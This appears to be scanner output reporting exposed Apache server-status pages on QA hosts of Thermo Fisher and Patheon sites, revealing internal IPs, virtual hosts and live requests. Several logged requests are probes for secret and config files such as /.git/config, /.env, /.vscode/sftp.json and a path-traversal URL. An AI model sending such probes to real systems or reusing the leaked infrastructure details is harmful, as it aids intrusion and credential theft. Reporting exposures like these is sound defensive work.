10.253.106.180http/1.1qa1-chemicals.thermofisher.co.kGET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 19-078710/0/0R 0.00535000.00.000.00 10.253.106.180http/1.1 20-078720/0/0R 0.00536000.00.000.00 10.253.106.199http/1.1 21-078730/0/0R 0.00536000.00.000.00 10.253.106.199http/1.1 22-078744/4/4K 0.002291311617.00.020.02 10.253.106.180http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/libs/granite/csrf/token.json HTTP/1.1 23-078750/0/0R 0.00535000.00.000.00 10.253.106.180http/1.1 24-078760/0/0R 0.00535000.00.000.00 10.253.106.199http/1.1 25-085191/1/2K 0.01624387877514.60.010.01 10.253.106.180http/1.1www-qa.patheon.com:80GET /us/en/home.html HTTP/1.1 26-078782/2/2K 0.016066381330515.80.020.02 10.253.106.180http/1.1www-qa.patheon.com:80GET /us/en/global-network.html HTTP/1.1 27-078792/41/41K 0.085302696020.74.114.11 10.253.106.180http/1.1qa1-corporate.thermofisher.com:GET / HTTP/1.1 28-078800/0/0R 0.00535000.00.000.00 10.253.106.180http/1.1 29-085201/1/2K 0.0154113122262418.40.020.02 10.253.106.180http/1.1www-qa.patheon.com:80GET /us/en/innovative-solutions.html HTTP/1.1 30-085211/1/2K 0.00614323864688.60.090.09 10.253.106.180http/1.1www-qa.patheon.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 31-085222/2/3K 0.01511272548421.20.020.02 10.253.106.180http/1.1www-qa.patheon.kr:80GET /akamai/sureroute-test-object.html HTTP/1.1 32-085232/2/3K 0.0142294370738.90.040.04 10.253.106.180http/1.1qa1-chemicals.thermofisher.co.kGET /content/dam/LifeTech/global/promotions/meganav/2017/01-Jan 33-078900/0/0R 0.00532000.00.000.00 10.253.106.199http/1.1 34-078993/3/3K 0.006713559.40.010.01 10.253.106.199http/1.1qa1-chemicals.thermofisher.co.kGET /akamai/sureroute-test-object.html HTTP/1.1 35-079033/27/27K 0.09501935919105.72.412.41 10.253.106.199http/1.1qa1-chemicals.thermofisher.co.kGET /kr/en/home.html HTTP/1.1 36-079041/4/4K 0.0067021.30.000.00 10.253.106.180http/1.1www-qa.patheon.cn:80GET / HTTP/1.1 37-079052/29/29K 0.0343174264864.42.412.41 10.253.106.199http/1.1qa1-chemicals.thermofisher.co.kGET /search/chat-launcher/chat-launcher.js HTTP/1.1 38-079060/19/19R 0.04317013780.01.641.64 10.253.106.199http/1.1 39-079070/0/0R 0.00439000.00.000.00 10.253.106.180http/1.1 40-079080/0/0R 0.00359000.00.000.00 10.253.106.199http/1.1 41-082230/0/1R 0.00505000.00.000.00 10.253.106.199http/1.1 42-082240/0/1R 0.00504000.00.000.00 10.253.106.199http/1.1 43-082250/0/1R 0.00504000.00.000.00 10.253.106.199http/1.1 44-082264/4/5K 0.0167128463.30.060.06 10.253.106.199http/1.1qa1-corporate.thermofisher.com:GET /akamai/sureroute-test-object.html HTTP/1.1 45-082277/7/8K 0.016341739838.10.040.04 10.253.106.180http/1.1qa1.unitylabservices.com:80GET /home/default.aspx HTTP/1.1 46-082280/0/1R 0.00503000.00.000.00 10.253.106.199http/1.1 47-082290/0/1R 0.00503000.00.000.00 10.253.106.199http/1.1 48-084057/7/8K 0.00462075241667159.50.160.16 10.253.106.199http/1.1qa1-corporate.thermofisher.com:GET /content/tfcorpsite/us/en/index/about.html HTTP/1.1 49-079173/3/3K 0.0048203759662.00.060.06 10.253.106.199http/1.1qa1-chemicals.thermofisher.co.kGET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 50-084062/2/3K 0.016064741298018.50.020.02 10.253.106.180http/1.1www-qa.patheon.cn:80GET /our-capabilities HTTP/1.1 51-079191/1/1K 0.0046208254165064.90.060.06 10.253.106.199http/1.1qa1-corporate.thermofisher.com:GET /content/tfcorpsite/us/SJTest/corporate-social-responsibili 52-079201/11/11K 0.015882711660615.23.993.99 10.253.106.180http/1.1www-qa.patheon.com:80GET /us/en/insights-resources/events.html HTTP/1.1 53-0840716/16/17W 0.0500
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879ce8066e4a
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Wednesday, 28-Jun-2023 15:14:48 EDT Restart Time: Wednesday, 28-Jun-2023 15:00:05 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 14 minutes 42 seconds Server load: 0.25 0.07 0.03 Total accesses: 1005 - Total Traffic: 23.0 MB - Total Duration: 1538823 CPU Usage: u1.18 s.6 cu.09 cs.08 - .221% CPU load 1.14 requests/sec - 26.7 kB/second - 23.4 kB/request - 1531.17 ms/request 164 requests currently being processed, 40 idle workers KKKKKKKKKKK_R__RRKKRRRKRRKKKRKKKKRKKKKRRRRRRKKRRKKKKKWK_KKKKKKKK KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK KRKKKKKKKKKKKKKKKKK_KKKKKKKKKKKKKKRK.KKR............W....___K___ _____________________________................................... ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0785288/88/88K 0.049051131.00.130.13 10.253.106.180http/1.1qa1-chemicals.thermofisher.co.kGET /server-status?auto HTTP/1.1 1-0785389/89/89K 0.042055132.10.130.13 10.253.106.199http/1.1qa1-chemicals.thermofisher.co.kGET /server-status?auto HTTP/1.1 2-078549/70/70K 0.126057591639937.40.240.24 10.253.106.180http/1.1www-qa.patheon.cn:80GET /global-network HTTP/1.1 3-0785549/215/215K 0.2301155474171.00.470.47 10.253.106.199http/1.1qa1-chemicals.thermofisher.co.kGET /store/v2/header-footer/js/authenticated.min.9fff0404902391 4-078561/2/2K 0.005880311606816.30.330.33 10.253.106.180http/1.1www-qa.patheon.com:80GET /us/en/our-capabilities/large-molecule.html HTTP/1.1 5-078574/4/4K 0.0030328524.10.020.02 10.253.106.199http/1.1qa1-chemicals.thermofisher.co.kGET /diagnostic-education/etc/designs/diagnostics/vendor/font-a 6-078581/1/1K 0.0154116822336416.80.020.02 10.253.106.180http/1.1www-qa.patheon.com:80GET /us/en/our-capabilities/commercial-services.html HTTP/1.1 7-078594/4/4K 0.0143037350653.30.640.64 10.253.106.180http/1.1qa1-chemicals.thermofisher.co.kGET /etc.clientlibs/tfsite/clientlibs/clientlib-site.min.css HT 8-078601/1/1K 0.00623367673489.60.090.09 10.253.106.180http/1.1www-qa.patheon.com:80GET /us/en/newsroom/thermo-fisher-scientific-opens-viral-vector 9-078613/3/3K 0.0150502927222.90.020.02 10.253.106.180http/1.1www-qa.patheon.kr:80GET /akamai/sureroute-test-object.html HTTP/1.1 10-078621/1/1K 0.01303112221.90.020.02 10.253.106.199http/1.1qa1-chemicals.thermofisher.co.kGET /diagnostic-education/etc/designs/diagnostics/vendor/bootst 12-078640/0/0R 0.00536000.00.000.00 10.253.106.180http/1.1 15-078670/0/0R 0.00536000.00.000.00 10.253.106.180http/1.1 16-078680/0/0R 0.00536000.00.000.00 10.253.106.180http/1.1 17-078694/4/4K 0.00258088447.20.050.05 10.253.106.180http/1.1qa1-chemicals.thermofisher.co.kGET / HTTP/1.1 18-078702/2/2K 0.0030416584.00.000.00 10.253.106.180http/1.1qa1-chemicals.thermofisher.co.kGET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 19-078710/0/0R 0.00535000.00.000.00 10.253.106.180http/1.1 20-078720/0/0R 0.00535000.00.000.00 10.253.106.199http/1.1 21-078730/0/0R 0.00535000.00.000.00 10.253.106.199http/1.1 22-078744/4/4K 0.002281311617.00.020.02 10.253.106.180http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/libs/granite/csrf/token.json HTTP/1.1 23-078750/0/0R 0.00534000.00.000.00 10.253.106.180http/1.1 24-078760/0/0R 0.00535000.00.000.00 10.253.106.199http/1.1 25-085191/1/2K 0.01614387877514.60.010.01 10.253.106.180http/1.1www-qa.patheon.com:80GET /us/en/home.html HTTP/1.1 26-078782/2/2K 0.015966381330515.80.020.02 10.253.106.180http/1.1www-qa.patheon.com:80GET /us/en/global-network.html HTTP/1.1 27-078792/41/41K 0.085302696020.74.114.11 10.253.106.180http/1.1qa1-corporate.thermofisher.com:GET / HTTP/1.1 28-078800/0/0R 0.00535000.00.000.00 10.253.106.180http/1.1 29-085201/1/2K 0.0154113122262418.40.020.02 10.253.106.180http/1.1www-qa.patheon.com:80GET /us/en/innovative-solutions.html HTTP/1.1 30-085211/1/2K 0.00614323864688.60.090.09 10.253.106.180http/1.1www-qa.patheon.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 31-085222/2/3K 0.01501272548421.20.020.02 10.253.106.180http/1.1www-qa.patheon.kr:80GET /akamai/sureroute-test-object.html HTTP/1.1 32-085232/2/3K 0.0142294370738.90.040.04 10.253.106.180http/1.1qa1-chemicals.thermofisher.co.kGET /content/dam/LifeTech/global/promotions/meganav/2017/01-Jan 33-078900/0/0R 0.00531000.00.000.00 10.253.106.199http/1.1 34-078993/3/3K 0.006713559.40.010.01 10.253.106.199http/1.1qa1-chemicals.thermofisher.co.kGET /akamai/sureroute-test-object.html HTTP/1.1 35-079033/27/27K 0.09501935919105.72.412.41 10.253.106.199http/1.1qa1-chemicals.thermofisher.co.kGET /kr/en/home.html HTTP/1.1 36-079041/4/4K 0.0067021.30.000.00 10.253.106.180http/1.1www-qa.patheon.cn:80GET / HTTP/1.1 37-079052/29/29K 0.0343174264864.42.412.41 10.253.106.199http/1.1qa1-chemicals.thermofisher.co.kGET /search/chat-launcher/chat-launcher.js HTTP/1.1 38-079060/19/19R 0.04317013780.01.641.64 10.253.106.199http/1.1 39-079070/0/0R 0.00438000.00.000.00 10.253.106.180http/1.1 40-079080/0/0R 0.00359000.00.000.00 10.253.106.199http/1.1 41-082230/0/1R 0.00505000.00.000.00 10.253.106.199http/1.1 42-082240/0/1R 0.00504000.00.000.00 10.253.106.199http/1.1 43-082250/0/1R 0.00504000.00.000.00 10.253.106.199http/1.1 44-082264/4/5K 0.0167128463.30.060.06 10.253.106.199http/1.1qa1-corporate.thermofisher.com:GET /akamai/sureroute-test-object.html HTTP/1.1 45-082277/7/8K 0.016341739838.10.040.04 10.253.106.180http/1.1qa1.unitylabservices.com:80GET /home/default.aspx HTTP/1.1 46-082280/0/1R 0.00503000.00.000.00 10.253.106.199http/1.1 47-082290/0/1R 0.00503000.00.000.00 10.253.106.199http/1.1 48-084057/7/8K 0.00452075241667159.50.160.16 10.253.106.199http/1.1qa1-corporate.thermofisher.com:GET /content/tfcorpsite/us/en/index/about.html HTTP/1.1 49-079173/3/3K 0.0047203759662.00.060.06 10.253.106.199http/1.1qa1-chemicals.thermofisher.co.kGET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 50-084062/2/3K 0.015964741298018.50.020.02 10.253.106.180http/1.1www-qa.patheon.cn:80GET /our-capabilities HTTP/1.1 51-079191/1/1K 0.0045208254165064.90.060.06 10.253.106.199http/1.1qa1-corporate.thermofisher.com:GET /content/tfcorpsite/us/SJTest/corporate-social-responsibili 52-079201/11/11K 0.015882711660615.23.993.99 10.253.106.180http/1.1www-qa.patheon.com:80GET /us/en/insights-resources/events.html HTTP/1.1 53-0840714/14/15<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879c62192553
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.56 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Mar 15 2023 20:56:52 Current Time: Thursday, 11-May-2023 06:45:09 EDT Restart Time: Tuesday, 09-May-2023 17:47:59 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 1 day 12 hours 57 minutes 9 seconds Server load: 0.07 0.02 0.00 Total accesses: 40237 - Total Traffic: 406.9 MB - Total Duration: 1976297 CPU Usage: u11.06 s16.09 cu37.13 cs10.32 - .0561% CPU load .302 requests/sec - 3207 B/second - 10.4 kB/request - 49.1164 ms/request 41 requests currently being processed, 34 idle workers _KKKKWK_R__KR____K____R_R___RRRR__R__R__RRK_R____KR_______.RK.RR R.RRR.RR.RK..RRR...................................RR........... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0315460/30/242_ 0.03010223110.00.046.81 10.253.106.133http/1.1www-qa.patheon.jp:80GET /.git/config HTTP/1.1 1-0414424/24/186K 0.0237381932.80.031.27 10.253.106.133http/1.1www-qa.patheon.cn:80GET /.env HTTP/1.1 2-0293913303/13303/13303K 7.8870789820127.919.6619.66 10.253.106.167http/1.1qa1-chemicals.thermofisher.co.kGET /server-status?auto HTTP/1.1 3-0294013303/13303/13303K 7.2070740520127.919.6619.66 10.253.106.133http/1.1qa1-chemicals.thermofisher.co.kGET /server-status?auto HTTP/1.1 4-041454/4/164K 0.00410311105.90.013.15 10.253.106.167http/1.1www-qa.patheon.jp:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 5-016750/14/186W 0.0100196680.00.021.38 10.253.106.133http/1.1qa1-chemicals.thermofisher.co.kGET /server-status HTTP/1.1 6-03155011/13/232K 0.01531603620.00.022.76 10.253.106.167http/1.1www-qa.patheon.kr:80GET /server-status HTTP/1.1 7-0246320/11/179_ 0.014531090.00.035.60 10.253.106.167http/1.1www-qa.patheon.kr:80GET /.git/config HTTP/1.1 8-016810/0/210R 0.006730153590.00.004.49 10.253.106.133http/1.1 9-041460/2/226_ 0.00411209190.00.004.14 10.253.106.133http/1.1qa1.unitylabservices.com:80GET /.git/config HTTP/1.1 10-0180450/46/237_ 0.27129233700.00.912.04 10.253.106.167http/1.1www-qa.patheon.jp:80GET /.git/config HTTP/1.1 11-0414719/19/209K 0.01092935024.20.022.20 10.253.106.167http/1.1www-qa.patheon.jp:80GET /config.json HTTP/1.1 12-0315560/16/184R 0.006730219860.00.044.66 10.253.106.167http/1.1 13-041480/6/268_ 0.00038441080.00.012.32 10.253.106.167http/1.1qa1.onelambda.com:80GET /.git/config HTTP/1.1 14-041490/13/212_ 0.00126500930.00.021.75 10.253.106.133http/1.1qa1.onelambda.com:80GET /.git/config HTTP/1.1 15-0327570/32/244_ 0.05425100840.00.139.04 10.253.106.167http/1.1qa1.unitylabservices.com:80GET /.git/config HTTP/1.1 16-017760/33/262_ 0.02340102760.00.043.42 10.253.106.133http/1.1www-qa.patheon.cn:80GET /.git/config HTTP/1.1 17-041507/7/150K 0.00110294917.90.012.14 10.253.106.133http/1.1qa1-chemicals.thermofisher.co.kGET /v2/_catalog HTTP/1.1 18-041540/0/187_ 0.0040254780.00.006.38 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 19-0327590/5/137_ 0.004022630.00.001.26 10.253.106.167http/1.1qa1-corporate.thermofisher.com:GET /.git/config HTTP/1.1 20-041550/0/160_ 0.0040270590.00.003.90 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 21-041560/0/170_ 0.004030850.00.002.53 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 22-017890/0/163R 0.00673041670.00.002.26 10.253.106.133http/1.1 23-041570/0/176_ 0.0040153860.00.005.56 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 24-0283220/9/224R 0.027041797100.00.182.70 10.253.106.167http/1.1 25-041580/0/175_ 0.0040326180.00.002.05 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 26-041590/0/170_ 0.0040339800.00.002.61 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 27-041600/0/272_ 0.0040360040.00.0016.18 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 28-023220/2/139R 0.0012373889728360.00.151.94 10.253.106.167http/1.1 29-0296010/22/222R 0.029780144790.01.223.39 10.253.106.167http/1.1 30-0327600/0/247R 0.00673083480.00.0010.55 10.253.106.133http/1.1 31-0288110/2/205R 0.007044146860.00.004.57 10.253.106.167http/1.1 32-041610/0/218_ 0.0040267330.00.0022.42 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 33-041620/0/247_ 0.0030245750.00.003.49 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 34-0320970/1/221R 0.00720067230.00.009.95 10.253.106.133http/1.1 35-041630/0/163_ 0.0030313290.00.004.76 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 36-041640/0/200_ 0.003042240.00.002.58 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 37-0288260/24/232R 0.049738802580630.00.12102.29 10.253.106.133http/1.1 38-041650/0/146_ 0.003087990.00.001.62 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 39-041660/0/173_ 0.0030297760.00.001.90 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 40-04860/8/193R 0.006730164090.00.013.48 10.253.106.133http/1.1 41-023230/5/153R 0.0497810197100.00.131.58 10.253.106.167http/1.1 42-023248/44/159K 0.0400194879.50.070.82 10.253.106.167http/1.1qa1.onelambda.com:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 43-041670/0/156_ 0.003089950.00.003.67 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 44-023250/1/158R 0.0010356715342510.00.021.73 10.253.106.133http/1.1 45-041680/0/170_ 0.0030446410.00.002.90 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 46-023260/22/239_ 0.02438280510.00.241.49 10.253.106.133http/1.1qa1-corporate.thermofisher.com:GET /.git/config HTTP/1.1 47-041690/0/139_ 0.0030446900.00.002.53 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 48-041700/0/105_ 0.0030216720.00.000.91 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 49-0200771/12/200K 0.0280191460.90.443.84 10.253.106.167http/1.1www-qa.patheon.jp:80GET / HTTP/1.1 50-0321120/0/184R 0.00720058470.00.002.23 10.253.106.167http/1.1 51-041710/0/194_ 0.0030421000.00.003.67 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 52-041720/0/156_ 0.0030364000.00.00<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879c29366a65
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.56 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Mar 15 2023 20:56:52 Current Time: Thursday, 11-May-2023 06:45:10 EDT Restart Time: Tuesday, 09-May-2023 17:47:59 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 1 day 12 hours 57 minutes 10 seconds Server load: 0.07 0.02 0.00 Total accesses: 40240 - Total Traffic: 406.9 MB - Total Duration: 1976354 CPU Usage: u11.06 s16.09 cu37.13 cs10.32 - .0561% CPU load .302 requests/sec - 3207 B/second - 10.4 kB/request - 49.1142 ms/request 41 requests currently being processed, 34 idle workers _KKKKKK_R__KR____K____R_R___RRRR__R__R__RRW_R____KR_______.RK.RR R.RRR.RR.RK..RRR...................................RR........... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0315460/30/242_ 0.03010223110.00.046.81 10.253.106.133http/1.1www-qa.patheon.jp:80GET /.git/config HTTP/1.1 1-0414424/24/186K 0.0237381932.80.031.27 10.253.106.133http/1.1www-qa.patheon.cn:80GET /.env HTTP/1.1 2-0293913303/13303/13303K 7.8880789820127.919.6619.66 10.253.106.167http/1.1qa1-chemicals.thermofisher.co.kGET /server-status?auto HTTP/1.1 3-0294013303/13303/13303K 7.2080740520127.919.6619.66 10.253.106.133http/1.1qa1-chemicals.thermofisher.co.kGET /server-status?auto HTTP/1.1 4-041454/4/164K 0.00410311105.90.013.15 10.253.106.167http/1.1www-qa.patheon.jp:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 5-016752/16/188K 0.01014197026.40.031.38 10.253.106.133http/1.1www-qa.patheon.jp:80GET /s/930323e2236313e26333e23323/_/;/META-INF/maven/com.atlass 6-03155011/13/232K 0.01631603620.00.022.76 10.253.106.167http/1.1www-qa.patheon.kr:80GET /server-status HTTP/1.1 7-0246320/11/179_ 0.015531090.00.035.60 10.253.106.167http/1.1www-qa.patheon.kr:80GET /.git/config HTTP/1.1 8-016810/0/210R 0.006740153590.00.004.49 10.253.106.133http/1.1 9-041460/2/226_ 0.00411209190.00.004.14 10.253.106.133http/1.1qa1.unitylabservices.com:80GET /.git/config HTTP/1.1 10-0180450/46/237_ 0.27229233700.00.912.04 10.253.106.167http/1.1www-qa.patheon.jp:80GET /.git/config HTTP/1.1 11-0414719/19/209K 0.01192935024.20.022.20 10.253.106.167http/1.1www-qa.patheon.jp:80GET /config.json HTTP/1.1 12-0315560/16/184R 0.006740219860.00.044.66 10.253.106.167http/1.1 13-041480/6/268_ 0.00138441080.00.012.32 10.253.106.167http/1.1qa1.onelambda.com:80GET /.git/config HTTP/1.1 14-041490/13/212_ 0.00226500930.00.021.75 10.253.106.133http/1.1qa1.onelambda.com:80GET /.git/config HTTP/1.1 15-0327570/32/244_ 0.05425100840.00.139.04 10.253.106.167http/1.1qa1.unitylabservices.com:80GET /.git/config HTTP/1.1 16-017760/33/262_ 0.02340102760.00.043.42 10.253.106.133http/1.1www-qa.patheon.cn:80GET /.git/config HTTP/1.1 17-041507/7/150K 0.00110294917.90.012.14 10.253.106.133http/1.1qa1-chemicals.thermofisher.co.kGET /v2/_catalog HTTP/1.1 18-041540/0/187_ 0.0050254780.00.006.38 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 19-0327590/5/137_ 0.005022630.00.001.26 10.253.106.167http/1.1qa1-corporate.thermofisher.com:GET /.git/config HTTP/1.1 20-041550/0/160_ 0.0050270590.00.003.90 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 21-041560/0/170_ 0.005030850.00.002.53 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 22-017890/0/163R 0.00674041670.00.002.26 10.253.106.133http/1.1 23-041570/0/176_ 0.0050153860.00.005.56 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 24-0283220/9/224R 0.027051797100.00.182.70 10.253.106.167http/1.1 25-041580/0/175_ 0.0050326180.00.002.05 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 26-041590/0/170_ 0.0050339800.00.002.61 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 27-041600/0/272_ 0.0050360040.00.0016.18 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 28-023220/2/139R 0.0012383889728360.00.151.94 10.253.106.167http/1.1 29-0296010/22/222R 0.029790144790.01.223.39 10.253.106.167http/1.1 30-0327600/0/247R 0.00674083480.00.0010.55 10.253.106.133http/1.1 31-0288110/2/205R 0.007054146860.00.004.57 10.253.106.167http/1.1 32-041610/0/218_ 0.0050267330.00.0022.42 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 33-041620/0/247_ 0.0040245750.00.003.49 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 34-0320970/1/221R 0.00721067230.00.009.95 10.253.106.133http/1.1 35-041630/0/163_ 0.0040313290.00.004.76 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 36-041640/0/200_ 0.004042240.00.002.58 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 37-0288260/24/232R 0.049748802580630.00.12102.29 10.253.106.133http/1.1 38-041650/0/146_ 0.004087990.00.001.62 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 39-041660/0/173_ 0.0040297760.00.001.90 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 40-04860/8/193R 0.006740164090.00.013.48 10.253.106.133http/1.1 41-023230/5/153R 0.0497910197100.00.131.58 10.253.106.167http/1.1 42-023249/45/160W 0.04001951011.70.070.82 10.253.106.167http/1.1qa1-chemicals.thermofisher.co.kGET /server-status HTTP/1.1 43-041670/0/156_ 0.004089950.00.003.67 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 44-023250/1/158R 0.0010366715342510.00.021.73 10.253.106.133http/1.1 45-041680/0/170_ 0.0040446410.00.002.90 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 46-023260/22/239_ 0.02538280510.00.241.49 10.253.106.133http/1.1qa1-corporate.thermofisher.com:GET /.git/config HTTP/1.1 47-041690/0/139_ 0.0040446900.00.002.53 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 48-041700/0/105_ 0.0040216720.00.000.91 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 49-0200771/12/200K 0.0290191460.90.443.84 10.253.106.167http/1.1www-qa.patheon.jp:80GET / HTTP/1.1 50-0321120/0/184R 0.00721058470.00.002.23 10.253.106.167http/1.1 51-041710/0/194_ 0.0040421000.00.003.67 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 52-041720/0/156_ 0.00403640
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879c49baeb48
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Friday, 14-Apr-2023 16:46:47 EDT Restart Time: Thursday, 13-Apr-2023 11:25:25 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 1 day 5 hours 21 minutes 21 seconds Server load: 0.06 0.02 0.00 Total accesses: 31574 - Total Traffic: 623.4 MB - Total Duration: 574881 CPU Usage: u7.18 s13.13 cu34.85 cs7.75 - .0595% CPU load .299 requests/sec - 6.0 kB/second - 20.2 kB/request - 18.2074 ms/request 76 requests currently being processed, 4 idle workers KKKRRKKRRRKRRRKKRKRRKKWRRRKKKKKRKKRRRKKRKKKWKKKWKKKRRRKRRRKRRKKK KKRRRKKKK_R__RK_................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0103081/33/165K 0.0534037990.80.200.87 10.253.106.215http/1.1qa1.onelambda.com:80GET /debug/default/view?panel=config HTTP/1.1 1-0383810568/10568/10568K 4.9880496815966.415.5915.59 10.253.106.141http/1.1qa1-chemicals.thermofisher.co.kGET /server-status?auto HTTP/1.1 2-0383910568/10568/10568K 6.1980611015966.315.5915.59 10.253.106.215http/1.1qa1-chemicals.thermofisher.co.kGET /server-status?auto HTTP/1.1 3-0134500/0/196R 0.00533082210.00.002.48 10.253.106.141http/1.1 4-0136360/1/169R 0.00838057860.00.001.95 10.253.106.215http/1.1 5-0134513/13/328K 0.00210112453.90.430.92 10.253.106.141http/1.1qa1-chemicals.thermofisher.co.kGET /v2/_catalog HTTP/1.1 6-0130771/14/140K 0.013624810.70.052.13 10.253.106.215http/1.1qa1-corporate.thermofisher.com:GET /.vscode/sftp.json HTTP/1.1 7-0128580/6/134R 0.00574023960.00.011.33 10.253.106.215http/1.1 8-0140220/0/129R 0.00818041440.00.002.57 10.253.106.215http/1.1 9-0132680/1/199R 0.00256141124480.00.013.42 10.253.106.141http/1.1 10-0145381/1/145K 0.003349484.50.001.15 10.253.106.215http/1.1qa1-corporate.thermofisher.com:GET /server-status HTTP/1.1 11-0134520/6/129R 0.00513040440.01.292.74 10.253.106.141http/1.1 12-0140230/0/120R 0.00797033270.00.001.09 10.253.106.141http/1.1 